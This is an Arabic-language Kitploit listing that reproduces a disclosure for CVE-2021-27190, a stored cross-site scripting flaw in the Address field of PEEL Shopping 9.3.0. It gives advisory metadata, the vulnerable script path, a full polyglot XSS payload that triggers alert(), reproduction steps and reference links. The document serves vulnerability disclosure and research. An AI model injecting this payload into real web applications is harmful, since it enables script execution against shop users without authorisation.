Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2021-27190-PEEL-Shopping-cart-9.3.0-Stored-XSS | Kitploit
أدوات/GitHubGitHub/anmolksachan/cve-2021-27190-peel-shopping-cart-9.3.0-stored-xss
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراقالتعلم والتعليم
GitHubanmolksachan/cve-2021-27190-peel-shopping-cart-9.3.0-stored-xss

CVE-2021-27190-PEEL-Shopping-cart-9.3.0-Stored-XSS

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
33منذ 5 سنواتلم تتم المراجعة بعد

CVE-2021-27190 - PEEL Shopping، عربة تسوق للتجارة الإلكترونية - ثغرة تخزين السكربتات عبر المواقع (XSS) في 'Address'

شاهد الفيديو

التاريخ

2021-02-11

مؤلف الاستغلال

Anmol K Sachan

الصفحة الرئيسية للمورّد

https://www.peel.fr/

رابط البرنامج

https://www.peel.fr/nos-offres-1/peel-shopping-31.html
https://sourceforge.net/projects/peel-shopping/

رابط البرنامج المُعرَّض للثغرة

https://drive.google.com/file/d/1dIwRdaqtEyqUUgxbRqrHiS5WQ10nEG8z/view?usp=sharing

البرنامج: :

PEEL SHOPPING 9.3.0

نوع الثغرة

سكربت عبر المواقع المخزّن (Stored XSS)

الثغرة

XSS مخزّن

تم الاختبار على Windows 10 مع XAMPP


CVE المعيّن

CVE-2021-27190
هذا التطبيق معرّض لثغرة تخزين السكربت عبر المواقع (Stored XSS).

السكربت المُعرَّض للثغرة

http://localhost/peel-shopping_9_3_0/utilisateurs/change_params.php

https://github.com/anmolksachan/CVE-2021-27190-PEEL-Shopping-cart-9.3.0-Stored-XSS/edit/main/README.MD## المعاملات المُعرَّضة للثغرة 'Address'

الحمولة المستخدمة

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e

POC

https://drive.google.com/file/d/1t1hksDsYqYsqryRq61tNIQQMTCFidtc1/view
في نفس الصفحة التي حقنّا فيها الحمولة، انقر على حقل النص لتعديل العنوان.
سترى كود Javascript (XSS) الخاص بك يتم تنفيذه.

المراجع

  1. https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27190
  2. https://packetstormsecurity.com/files/161367/PEEL-Shopping-9.3.0-Cross-Site-Scripting.html
  3. https://www.exploit-db.com/exploits/49553
  4. https://www.secuneus.com/cve-2021-27190-peel-shopping-ecommerce-shopping-cart-stored-cross-site-scripting-vulnerability-in-address/
  5. https://cxsecurity.com/issue/WLB-2021020054
  6. https://nvd.nist.gov/vuln/detail/CVE-2021-27190
تنزيل الأداة